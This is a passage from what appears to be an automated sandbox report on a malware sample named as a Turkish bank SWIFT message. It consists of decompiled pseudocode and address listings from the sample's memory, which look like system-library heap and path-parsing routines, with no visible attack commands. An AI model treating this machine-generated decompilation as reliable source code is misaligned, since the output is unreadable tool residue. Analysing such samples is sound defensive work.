                                                                    														E018DFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                                                    														_t529 = _t529 + 0xc;
                                                                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                    														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                                                    														 *(_t528 - 0x78) = _t479;
                                                                    														__eflags = _t505;
                                                                    														if(_t505 != 0) {
                                                                    															_t241 = _t505 + 4;
                                                                    															 *_t241 =  *(_t505 + 4) | 1;
                                                                    															__eflags =  *_t241;
                                                                    														}
                                                                    													}
                                                                    													_t328 =  *(_t528 + 0x1c);
                                                                    													__eflags = _t328;
                                                                    													if(_t328 == 0) {
                                                                    														L87:
                                                                    														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                                                    														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                                                    														_t455 =  *(_t528 - 0xdc);
                                                                    														 *(_t427 + 0x14) = _t455;
                                                                    														_t480 =  *(_t528 - 0xa0);
                                                                    														_t517 = 3;
                                                                    														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                                                    														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                                                    															asm("rdtsc");
                                                                    															 *(_t427 + 0x3c) = _t480;
                                                                    														} else {
                                                                    															 *(_t427 + 0x3c) = _t455;
                                                                    														}
                                                                    														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                                                    														_t456 =  *[fs:0x18];
                                                                    														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                                                    														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                                                    														_t427 = 0;
                                                                    														__eflags = 0;
                                                                    														_t511 = 0x18;
                                                                    														goto L91;
                                                                    													} else {
                                                                    														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                                                    														__eflags = _t519;
                                                                    														 *(_t528 - 0x8c) = _t328;
                                                                    														do {
                                                                    															_t506 =  *((intOrPtr*)(_t519 - 4));
                                                                    															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                                                    															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                                                    															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                                                    															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                                                    															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                                                    																_t334 =  *_t519;
                                                                    															} else {
                                                                    																_t334 = 0;
                                                                    															}
                                                                    															_t336 = _t334 & 0x000000ff;
                                                                    															__eflags = _t336;
                                                                    															_t427 =  *(_t528 - 0x88);
                                                                    															if(_t336 == 0) {
                                                                    																_t481 = _t479 + _t506;
                                                                    																__eflags = _t481;
                                                                    																 *(_t528 - 0x78) = _t481;
                                                                    																E018DF3E0(_t479 + _t427, _t457, _t506);
                                                                    																_t529 = _t529 + 0xc;
                                                                    															} else {
                                                                    																_t340 = _t336 - 1;
                                                                    																__eflags = _t340;
                                                                    																if(_t340 == 0) {
                                                                    																	E018DF3E0( *(_t528 - 0xb8), _t457, _t506);
                                                                    																	_t529 = _t529 + 0xc;
                                                                    																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                                                    																} else {
                                                                    																	__eflags = _t340 == 0;
                                                                    																	if(_t340 == 0) {
                                                                    																		__eflags = _t506 - 8;
                                                                    																		if(_t506 == 8) {
                                                                    																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                                                    																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                                                    																		}
                                                                    																	}
                                                                    																}
                                                                    															}
                                                                    															_t339 = 0x10;
                                                                    															_t519 = _t519 + _t339;
                                                                    															_t263 = _t528 - 0x8c;
                                                                    															 *_t263 =  *(_t528 - 0x8c) - 1;
                                                                    															__eflags =  *_t263;
                                                                    															_t479 =  *(_t528 - 0x78);
                                                                    														} while ( *_t263 != 0);
                                                                    														goto L87;
                                                                    													}
                                                                    												}
                                                                    											} else {
                                                                    												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                                                    												 *(_t528 - 0xa2) = _t392;
                                                                    												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                                                    												__eflags = _t469;
                                                                    												while(1) {
                                                                    													 *(_t528 - 0xe4) = _t511;
                                                                    													__eflags = _t392;
                                                                    													_t393 = _t427;
                                                                    													if(_t392 != 0) {
                                                                    														_t393 =  *((intOrPtr*)(_t469 + 4));
                                                                    													}
                                                                    													_t395 = (_t393 & 0x000000ff) - _t427;
                                                                    													__eflags = _t395;
                                                                    													if(_t395 == 0) {
                                                                    														_t511 = _t511 +  *_t469;
                                                                    														__eflags = _t511;
                                                                    													} else {
                                                                    														_t398 = _t395 - 1;
                                                                    														__eflags = _t398;
                                                                    														if(_t398 == 0) {
                                                                    															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                                    															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                                    														} else {
                                                                    															__eflags = _t398 == 1;
                                                                    															if(_t398 == 1) {
                                                                    																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                                    																_t402 =  *_t469 & 0x0000ffff;
                                                                    																 *(_t528 - 0xac) = _t402;
                                                                    																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                    															}
                                                                    														}
                                                                    													}
                                                                    													__eflags = _t511 -  *(_t528 - 0xe4);
                                                                    													if(_t511 <  *(_t528 - 0xe4)) {
                                                                    														break;
                                                                    													}
                                                                    													_t397 =  *(_t528 - 0x88) + 1;
                                                                    													 *(_t528 - 0x88) = _t397;
                                                                    													_t469 = _t469 + 0x10;
                                                                    													__eflags = _t397 -  *(_t528 + 0x1c);
                                                                    													_t392 =  *(_t528 - 0xa2);
                                                                    													if(_t397 <  *(_t528 + 0x1c)) {
                                                                    														continue;
                                                                    													}
                                                                    													goto L45;
                                                                    												}
                                                                    												_t475 = 0x216;
                                                                    												 *(_t528 - 0x74) = 0x216;
                                                                    												goto L45;
                                                                    											}
                                                                    										} else {
                                                                    											asm("lock dec dword [eax+ecx*8+0x4]");
                                                                    											goto L16;
                                                                    										}
                                                                    									}
                                                                    									_t491 = E01964CAB(_t306, _t528 - 0xa4);
                                                                    									 *(_t528 - 0x74) = _t491;
                                                                    									__eflags = _t491;
                                                                    									if(_t491 != 0) {
                                                                    										goto L91;
                                                                    									} else {
                                                                    										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                    										goto L20;
                                                                    									}
                                                                    								}
                                                                    								L16:
                                                                    								 *(_t528 - 0x74) = 0x1069;
                                                                    								L93:
                                                                    								_t298 =  *(_t528 - 0xd0) + 1;
                                                                    								 *(_t528 - 0xd0) = _t298;
                                                                    								_t474 = _t474 + _t511;
                                                                    								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                    								_t494 = 4;
                                                                    								__eflags = _t298 - _t494;
                                                                    								if(_t298 >= _t494) {
                                                                    									goto L100;
                                                                    								}
                                                                    								_t494 =  *(_t528 - 0xcc);
                                                                    								_t435 = _t298;
                                                                    								continue;
                                                                    							}
                                                                    							__eflags = _t494[2] | _t494[3];
                                                                    							if((_t494[2] | _t494[3]) == 0) {
                                                                    								goto L15;
                                                                    							}
                                                                    							goto L12;
                                                                    						}
                                                                    						__eflags = _t301;
                                                                    						if(_t301 != 0) {
                                                                    							goto L92;
                                                                    						}
                                                                    						goto L10;
                                                                    						L92:
                                                                    						goto L93;
                                                                    					}
                                                                    				} else {
                                                                    					_push(0x57);
                                                                    					L101:
                                                                    					return E018ED130(_t427, _t494, _t511);
                                                                    				}
                                                                    			}










































































                                                                    0x01965ba5
                                                                    0x01965baa
                                                                    0x01965baf
                                                                    0x01965bb4
                                                                    0x01965bb6
                                                                    0x01965bbc
                                                                    0x01965bbe
                                                                    0x01965bc4
                                                                    0x01965bcd
                                                                    0x01965bd3
                                                                    0x01965bd6
                                                                    0x01965bdc
                                                                    0x01965be0
                                                                    0x01965be3
                                                                    0x01965beb
                                                                    0x01965bf2
                                                                    0x01965bf8
                                                                    0x01965bfe
                                                                    0x01965c04
                                                                    0x01965c0e
                                                                    0x01965c18
                                                                    0x01965c1f
                                                                    0x01965c25
                                                                    0x01965c2a
                                                                    0x01965c2c
                                                                    0x01965c32
                                                                    0x01965c3a
                                                                    0x01965c3f
                                                                    0x01965c42
                                                                    0x01965c48
                                                                    0x01965c5b
                                                                    0x01965c5b
                                                                    0x01965c2c
                                                                    0x01965cb7
                                                                    0x01965cb9
                                                                    0x01965cbf
                                                                    0x01965cc2
                                                                    0x01965cca
                                                                    0x01965ccb
                                                                    0x01965ccb
                                                                    0x01965cd1
                                                                    0x01965cd7
                                                                    0x01965cda
                                                                    0x01965ce1
                                                                    0x01965ce4
                                                                    0x01965ce7
                                                                    0x01965ced
                                                                    0x01965cf3
                                                                    0x01965cf9
                                                                    0x01965cff
                                                                    0x01965d08
                                                                    0x01965d0a
                                                                    0x01965d0e
                                                                    0x01965d10
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01965d16
                                                                    0x01965d1a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01965d20
                                                                    0x01965d22
                                                                    0x01965d25
                                                                    0x01965d2f
                                                                    0x01965d2f
                                                                    0x01965d33
                                                                    0x01965d3d
                                                                    0x01965d49
                                                                    0x01965d4b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01965d5a
                                                                    0x01965d5d
                                                                    0x01965d60
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01965d66
                                                                    0x01965d69
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01965d6f
                                                                    0x01965d6f
                                                                    0x01965d73
                                                                    0x01965d79
                                                                    0x01965d7f
                                                                    0x01965d86
                                                                    0x01965d95
                                                                    0x01965d98
                                                                    0x01965dba
                                                                    0x01965dcb
                                                                    0x01965dce
                                                                    0x01965dd3
                                                                    0x01965dd6
                                                                    0x01965dd8
                                                                    0x01965de6
                                                                    0x01965dec
                                                                    0x01965dee
                                                                    0x01965df1
                                                                    0x01965df3
                                                                    0x0196635a
                                                                    0x0196635a
                                                                    0x00000000
                                                                    0x0196635a
                                                                    0x01965dfe
                                                                    0x01965e02
                                                                    0x01965e05
                                                                    0x01965e07
                                                                    0x01965e10
                                                                    0x01965e13
                                                                    0x01965e1b
                                                                    0x01965e1c
                                                                    0x01965e21
                                                                    0x01965e22
                                                                    0x01965e23
                                                                    0x01965e25
                                                                    0x01965e2a
                                                                    0x01965e2c
                                                                    0x01965e2e
                                                                    0x01965e36
                                                                    0x01965e39
                                                                    0x01965e42
                                                                    0x01965e47
                                                                    0x01965e4d
                                                                    0x01965e54
                                                                    0x01965e54
                                                                    0x01965e54
                                                                    0x01965e2e
                                                                    0x01965e5c
                                                                    0x01965e5f
                                                                    0x01965e62
                                                                    0x01965e64
                                                                    0x01965e6b
                                                                    0x01965e70
                                                                    0x01965e7a
                                                                    0x01965e7a
                                                                    0x01965e7a
                                                                    0x01965e6b
                                                                    0x01965e7e
                                                                    0x01965e7f
                                                                    0x01965e7f
                                                                    0x01965e81
                                                                    0x01965e87
                                                                    0x01965e8b
                                                                    0x01965e8c
                                                                    0x01965e8c
                                                                    0x01965e8c
                                                                    0x01965e9a
                                                                    0x01965e9c
                                                                    0x01965ea2
                                                                    0x01965ea6
                                                                    0x01965f50
                                                                    0x01965f50
                                                                    0x01965f57
                                                                    0x01965f66
                                                                    0x01965f66
                                                                    0x01965f66
                                                                    0x01965f68
                                                                    0x01965f6a
                                                                    0x019663d0
                                                                    0x00000000
                                                                    0x01965f70
                                                                    0x01965f70
                                                                    0x01965f91
                                                                    0x01965f9c
                                                                    0x01965f9e
                                                                    0x01965fa4
                                                                    0x01965fa6
                                                                    0x0196638c
                                                                    0x01966392
                                                                    0x019663a1
                                                                    0x019663a7
                                                                    0x019663af
                                                                    0x019663af
                                                                    0x019663bd
                                                                    0x019663d8
                                                                    0x00000000
                                                                    0x019663d8
                                                                    0x01965fac
                                                                    0x01965fb2
                                                                    0x01965fb4
                                                                    0x01965fbd
                                                                    0x01965fc6
                                                                    0x01965fce
                                                                    0x01965fd4
                                                                    0x01965fdc
                                                                    0x01965fec
                                                                    0x01965fed
                                                                    0x01965fee
                                                                    0x01965fef
                                                                    0x01965ff9
                                                                    0x01965ffa
                                                                    0x01965ffb
                                                                    0x01965ffc
                                                                    0x01966000
                                                                    0x01966004
                                                                    0x01966012
                                                                    0x01966012
                                                                    0x01966018
                                                                    0x01966019
                                                                    0x0196601a
                                                                    0x0196601b
                                                                    0x0196601c
                                                                    0x01966020
                                                                    0x01966059
                                                                    0x0196605c
                                                                    0x01966061
                                                                    0x01966061
                                                                    0x01966022
                                                                    0x01966022
                                                                    0x01966022
                                                                    0x01966025
                                                                    0x0196602a
                                                                    0x0196602b
                                                                    0x01966031
                                                                    0x01966037
                                                                    0x01966038
                                                                    0x0196603e
                                                                    0x01966048
                                                                    0x01966049
                                                                    0x0196604a
                                                                    0x0196604b
                                                                    0x0196604c
                                                                    0x0196604d
                                                                    0x01966053
                                                                    0x01966054
                                                                    0x01966054
                                                                    0x01966062
                                                                    0x01966065
                                                                    0x01966067
                                                                    0x0196606a
                                                                    0x01966070
                                                                    0x01966075
                                                                    0x01966076
                                                                    0x01966081
                                                                    0x01966087
                                                                    0x01966095
                                                                    0x01966099
                                                                    0x0196609e
                                                                    0x019660a4
                                                                    0x019660ae
                                                                    0x019660b0
                                                                    0x019660b3
                                                                    0x019660b6
                                                                    0x019660b8
                                                                    0x019660ba
                                                                    0x019660ba
                                                                    0x019660ba
                                                                    0x019660ba
                                                                    0x019660be
                                                                    0x019660c0
                                                                    0x019660c5
                                                                    0x019660c5
                                                                    0x019660c5
                                                                    0x019660c6
                                                                    0x019660cd
                                                                    0x01966114
                                                                    0x019660cf
                                                                    0x019660cf
                                                                    0x019660d4
                                                                    0x019660d5
                                                                    0x019660da
                                                                    0x019660db
                                                                    0x019660e1
                                                                    0x019660e2
                                                                    0x019660e8
                                                                    0x019660f8
                                                                    0x019660fd
                                                                    0x019660fe
                                                                    0x01966102
                                                                    0x01966104
                                                                    0x01966107
                                                                    0x01966109
                                                                    0x0196610b
                                                                    0x0196610b
                                                                    0x0196610b
                                                                    0x0196610b
                                                                    0x0196610f
                                                                    0x0196610f
                                                                    0x01966117
                                                                    0x0196611a
                                                                    0x0196611f
                                                                    0x01966125
                                                                    0x01966134
                                                                    0x01966139
                                                                    0x0196613f
                                                                    0x01966146
                                                                    0x01966148
                                                                    0x0196614b
                                                                    0x0196614d
                                                                    0x0196614f
                                                                    0x0196614f
                                                                    0x0196614f
                                                                    0x0196614f
                                                                    0x01966153
                                                                    0x01966159
                                                                    0x01966159
                                                                    0x0196615c
                                                                    0x01966163
                                                                    0x01966169
                                                                    0x0196616c
                                                                    0x01966172
                                                                    0x01966181
                                                                    0x01966186
                                                                    0x01966187
                                                                    0x0196618b
                                                                    0x01966191
                                                                    0x01966195
                                                                    0x019661a3
                                                                    0x019661bb
                                                                    0x019661c0
                                                                    0x019661c3
                                                                    0x019661cc
                                                                    0x019661d0
                                                                    0x019661dc
                                                                    0x019661de
                                                                    0x019661e1
                                                                    0x019661e4
                                                                    0x019661e6
                                                                    0x019661e8
                                                                    0x019661e8
                                                                    0x019661e8
                                                                    0x019661e8
                                                                    0x019661e6
                                                                    0x019661ec
                                                                    0x019661f3
                                                                    0x01966203
                                                                    0x01966209
                                                                    0x0196620a
                                                                    0x01966216
                                                                    0x0196621d
                                                                    0x01966227
                                                                    0x01966241
                                                                    0x01966246
                                                                    0x0196624c
                                                                    0x01966257
                                                                    0x01966259
                                                                    0x0196625c
                                                                    0x0196625e
                                                                    0x01966260
                                                                    0x01966260
                                                                    0x01966260
                                                                    0x01966260
                                                                    0x0196625e
                                                                    0x01966264
                                                                    0x01966267
                                                                    0x01966269
                                                                    0x01966315
                                                                    0x01966315
                                                                    0x0196631b
                                                                    0x0196631e
                                                                    0x01966324
                                                                    0x01966327
                                                                    0x0196632f
                                                                    0x01966330
                                                                    0x01966333
                                                                    0x0196633a
                                                                    0x0196633c
                                                                    0x01966335
                                                                    0x01966335
                                                                    0x01966335
                                                                    0x0196633f
                                                                    0x01966342
                                                                    0x0196634c
                                                                    0x01966352
                                                                    0x01966355
                                                                    0x01966355
                                                                    0x01966359
                                                                    0x00000000
                                                                    0x0196626f
                                                                    0x01966275
                                                                    0x01966275
                                                                    0x01966278
                                                                    0x0196627e
                                                                    0x0196627e
                                                                    0x01966281
                                                                    0x01966287
                                                                    0x0196628d
                                                                    0x01966298
                                                                    0x0196629c
                                                                    0x019662a2
                                                                    0x0196629e
                                                                    0x0196629e
                                                                    0x0196629e
                                                                    0x019662a7
                                                                    0x019662a7
                                                                    0x019662aa
                                                                    0x019662b0
                                                                    0x019662f0
                                                                    0x019662f0
                                                                    0x019662f2
                                                                    0x019662f8
                                                                    0x019662fd
                                                                    0x019662b2
                                                                    0x019662b2
                                                                    0x019662b2
                                                                    0x019662b5
                                                                    0x019662dd
                                                                    0x019662e2
                                                                    0x019662e5
                                                                    0x019662b7
                                                                    0x019662b8
                                                                    0x019662bb
                                                                    0x019662bd
                                                                    0x019662c0
                                                                    0x019662c4
                                                                    0x019662cd
                                                                    0x019662cd
                                                                    0x019662c0
                                                                    0x019662bb
                                                                    0x019662b5
                                                                    0x01966302
                                                                    0x01966303
                                                                    0x01966305
                                                                    0x01966305
                                                                    0x01966305
                                                                    0x0196630c
                                                                    0x0196630c
                                                                    0x00000000
                                                                    0x0196627e
                                                                    0x01966269
                                                                    0x01965eac
                                                                    0x01965ebb
                                                                    0x01965ebe
                                                                    0x01965ecb
                                                                    0x01965ecb
                                                                    0x01965ece
                                                                    0x01965ece
                                                                    0x01965ed4
                                                                    0x01965ed7
                                                                    0x01965ed9
                                                                    0x01965edb
                                                                    0x01965edb
                                                                    0x01965ee1
                                                                    0x01965ee1
                                                                    0x01965ee3
                                                                    0x01965f20
                                                                    0x01965f20
                                                                    0x01965ee5
                                                                    0x01965ee5
                                                                    0x01965ee5
                                                                    0x01965ee8
                                                                    0x01965f11
                                                                    0x01965f18
                                                                    0x01965eea
                                                                    0x01965eea
                                                                    0x01965eed
                                                                    0x01965ef2
                                                                    0x01965ef8
                                                                    0x01965efb
                                                                    0x01965f0a
                                                                    0x01965f0a
                                                                    0x01965eed
                                                                    0x01965ee8
                                                                    0x01965f22
                                                                    0x01965f28
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01965f30
                                                                    0x01965f31
                                                                    0x01965f37
                                                                    0x01965f3a
                                                                    0x01965f3d
                                                                    0x01965f44
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01965f46
                                                                    0x01965f48
                                                                    0x01965f4d
                                                                    0x00000000
                                                                    0x01965f4d
                                                                    0x01965dda
                                                                    0x01965ddf
                                                                    0x00000000
                                                                    0x01965ddf
                                                                    0x01965dd8
                                                                    0x01965da7
                                                                    0x01965da9
                                                                    0x01965dac
                                                                    0x01965dae
                                                                    0x00000000
                                                                    0x01965db4
                                                                    0x01965db4
                                                                    0x00000000
                                                                    0x01965db4
                                                                    0x01965dae
                                                                    0x01965d88
                                                                    0x01965d8d
                                                                    0x01966363
                                                                    0x01966369
                                                                    0x0196636a
                                                                    0x01966370
                                                                    0x01966372
                                                                    0x0196637a
                                                                    0x0196637b
                                                                    0x0196637d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0196637f
                                                                    0x01966385
                                                                    0x00000000
                                                                    0x01966385
                                                                    0x01965d38
                                                                    0x01965d3b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01965d3b
                                                                    0x01965d27
                                                                    0x01965d29
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01966360
                                                                    0x00000000
                                                                    0x01966360
                                                                    0x01965c10
                                                                    0x01965c10
                                                                    0x019663da
                                                                    0x019663e5
                                                                    0x019663e5

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 81aeb595251e2fe83ab5c3c103b15c34ff4398e0b1aee2a7c2e8eb23072ee33a
                                                                    • Instruction ID: c985f1b2a856adc6ddd839d63fbc431a7de9c44dff43b752dff91faa52e19e9c
                                                                    • Opcode Fuzzy Hash: 81aeb595251e2fe83ab5c3c103b15c34ff4398e0b1aee2a7c2e8eb23072ee33a
                                                                    • Instruction Fuzzy Hash: D8426E75D00229CFEB24CF68C880BA9BBB9FF45305F1581AAD94DEB242D7749985CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 92%
                                                                    			E018B4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                                    				signed int _v8;
                                                                    				void* _v20;
                                                                    				signed int _v24;
                                                                    				char _v532;
                                                                    				char _v540;
                                                                    				signed short _v544;
                                                                    				signed int _v548;
                                                                    				signed short* _v552;
                                                                    				signed short _v556;
                                                                    				signed short* _v560;
                                                                    				signed short* _v564;
                                                                    				signed short* _v568;
                                                                    				void* _v570;
                                                                    				signed short* _v572;
                                                                    				signed short _v576;
                                                                    				signed int _v580;
                                                                    				char _v581;
                                                                    				void* _v584;
                                                                    				unsigned int _v588;
                                                                    				signed short* _v592;
                                                                    				void* _v597;
                                                                    				void* _v600;
                                                                    				void* _v604;
                                                                    				void* _v609;
                                                                    				void* _v616;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				unsigned int _t161;
                                                                    				signed int _t162;
                                                                    				unsigned int _t163;
                                                                    				void* _t169;
                                                                    				signed short _t173;
                                                                    				signed short _t177;
                                                                    				signed short _t181;
                                                                    				unsigned int _t182;
                                                                    				signed int _t185;
                                                                    				signed int _t213;
                                                                    				signed int _t225;
                                                                    				short _t233;
                                                                    				signed char _t234;
                                                                    				signed int _t242;
                                                                    				signed int _t243;
                                                                    				signed int _t244;
                                                                    				signed int _t245;
                                                                    				signed int _t250;
                                                                    				void* _t251;
                                                                    				signed short* _t254;
                                                                    				void* _t255;
                                                                    				signed int _t256;
                                                                    				void* _t257;
                                                                    				signed short* _t260;
                                                                    				signed short _t265;
                                                                    				signed short* _t269;
                                                                    				signed short _t271;
                                                                    				signed short** _t272;
                                                                    				signed short* _t275;
                                                                    				signed short _t282;
                                                                    				signed short _t283;
                                                                    				signed short _t290;
                                                                    				signed short _t299;
                                                                    				signed short _t307;
                                                                    				signed int _t308;
                                                                    				signed short _t311;
                                                                    				signed short* _t315;
                                                                    				signed short _t316;
                                                                    				void* _t317;
                                                                    				void* _t319;
                                                                    				signed short* _t321;
                                                                    				void* _t322;
                                                                    				void* _t323;
                                                                    				unsigned int _t324;
                                                                    				signed int _t325;
                                                                    				void* _t326;
                                                                    				signed int _t327;
                                                                    				signed int _t329;
                                                                    
                                                                    				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                                                    				_v8 =  *0x198d360 ^ _t329;
                                                                    				_t157 = _a8;
                                                                    				_t321 = _a4;
                                                                    				_t315 = __edx;
                                                                    				_v548 = __ecx;
                                                                    				_t305 = _a20;
                                                                    				_v560 = _a12;
                                                                    				_t260 = _a16;
                                                                    				_v564 = __edx;
                                                                    				_v580 = _a8;
                                                                    				_v572 = _t260;
                                                                    				_v544 = _a20;
                                                                    				if( *__edx <= 8) {
                                                                    					L3:
                                                                    					if(_t260 != 0) {
                                                                    						 *_t260 = 0;
                                                                    					}
                                                                    					_t254 =  &_v532;
                                                                    					_v588 = 0x208;
                                                                    					if((_v548 & 0x00000001) != 0) {
                                                                    						_v556 =  *_t315;
                                                                    						_v552 = _t315[2];
                                                                    						_t161 = E018CF232( &_v556);
                                                                    						_t316 = _v556;
                                                                    						_v540 = _t161;
                                                                    						goto L17;
                                                                    					} else {
                                                                    						_t306 = 0x208;
                                                                    						_t298 = _t315;
                                                                    						_t316 = E018B6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                                                    						if(_t316 == 0) {
                                                                    							L68:
                                                                    							_t322 = 0xc0000033;
                                                                    							goto L39;
                                                                    						} else {
                                                                    							while(_v581 == 0) {
                                                                    								_t233 = _v588;
                                                                    								if(_t316 > _t233) {
                                                                    									_t234 = _v548;
                                                                    									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                                                    										_t254 = L018B4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                                                    										if(_t254 == 0) {
                                                                    											_t169 = 0xc0000017;
                                                                    										} else {
                                                                    											_t298 = _v564;
                                                                    											_v588 = _t316;
                                                                    											_t306 = _t316;
                                                                    											_t316 = E018B6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                                                    											if(_t316 != 0) {
                                                                    												continue;
                                                                    											} else {
                                                                    												goto L68;
                                                                    											}
                                                                    										}
                                                                    									} else {
                                                                    										goto L90;
                                                                    									}
                                                                    								} else {
                                                                    									_v556 = _t316;
                                                                    									 *((short*)(_t329 + 0x32)) = _t233;
                                                                    									_v552 = _t254;
                                                                    									if(_t316 < 2) {
                                                                    										L11:
                                                                    										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                                                    											_t161 = 5;
                                                                    										} else {
                                                                    											if(_t316 < 6) {
                                                                    												L87:
                                                                    												_t161 = 3;
                                                                    											} else {
                                                                    												_t242 = _t254[2] & 0x0000ffff;
                                                                    												if(_t242 != 0x5c) {
                                                                    													if(_t242 == 0x2f) {
                                                                    														goto L16;
                                                                    													} else {
                                                                    														goto L87;
                                                                    													}
                                                                    													goto L101;
                                                                    												} else {
                                                                    													L16:
                                                                    													_t161 = 2;
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    									} else {
                                                                    										_t243 =  *_t254 & 0x0000ffff;
                                                                    										if(_t243 == 0x5c || _t243 == 0x2f) {
                                                                    											if(_t316 < 4) {
                                                                    												L81:
                                                                    												_t161 = 4;
                                                                    												goto L17;
                                                                    											} else {
                                                                    												_t244 = _t254[1] & 0x0000ffff;
                                                                    												if(_t244 != 0x5c) {
                                                                    													if(_t244 == 0x2f) {
                                                                    														goto L60;
                                                                    													} else {
                                                                    														goto L81;
                                                                    													}
                                                                    												} else {
                                                                    													L60:
                                                                    													if(_t316 < 6) {
                                                                    														L83:
                                                                    														_t161 = 1;
                                                                    														goto L17;
                                                                    													} else {
                                                                    														_t245 = _t254[2] & 0x0000ffff;
                                                                    														if(_t245 != 0x2e) {
                                                                    															if(_t245 == 0x3f) {
                                                                    																goto L62;
                                                                    															} else {
                                                                    																goto L83;
                                                                    															}
                                                                    														} else {
                                                                    															L62:
                                                                    															if(_t316 < 8) {
                                                                    																L85:
                                                                    																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                                    																goto L17;
                                                                    															} else {
                                                                    																_t250 = _t254[3] & 0x0000ffff;
                                                                    																if(_t250 != 0x5c) {
                                                                    																	if(_t250 == 0x2f) {
                                                                    																		goto L64;
                                                                    																	} else {
                                                                    																		goto L85;
                                                                    																	}
                                                                    																} else {
                                                                    																	L64:
                                                                    																	_t161 = 6;
                                                                    																	goto L17;
                                                                    																}
                                                                    															}
                                                                    														}
                                                                    													}
                                                                    												}
                                                                    											}
                                                                    											goto L101;
                                                                    										} else {
                                                                    											goto L11;
                                                                    										}
                                                                    									}
                                                                    									L17:
                                                                    									if(_t161 != 2) {
                                                                    										_t162 = _t161 - 1;
                                                                    										if(_t162 > 5) {
                                                                    											goto L18;
                                                                    										} else {
                                                                    											switch( *((intOrPtr*)(_t162 * 4 +  &M018B45F8))) {
                                                                    												case 0:
                                                                    													_v568 = 0x1871078;
                                                                    													__eax = 2;
                                                                    													goto L20;
                                                                    												case 1:
                                                                    													goto L18;
                                                                    												case 2:
                                                                    													_t163 = 4;
                                                                    													goto L19;
                                                                    											}
                                                                    										}
                                                                    										goto L41;
                                                                    									} else {
                                                                    										L18:
                                                                    										_t163 = 0;
                                                                    										L19:
                                                                    										_v568 = 0x18711c4;
                                                                    									}
                                                                    									L20:
                                                                    									_v588 = _t163;
                                                                    									_v564 = _t163 + _t163;
                                                                    									_t306 =  *_v568 & 0x0000ffff;
                                                                    									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                                    									_v576 = _t265;
                                                                    									if(_t265 > 0xfffe) {
                                                                    										L90:
                                                                    										_t322 = 0xc0000106;
                                                                    									} else {
                                                                    										if(_t321 != 0) {
                                                                    											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                                    												if(_v580 != 0) {
                                                                    													goto L23;
                                                                    												} else {
                                                                    													_t322 = 0xc0000106;
                                                                    													goto L39;
                                                                    												}
                                                                    											} else {
                                                                    												_t177 = _t306;
                                                                    												goto L25;
                                                                    											}
                                                                    											goto L101;
                                                                    										} else {
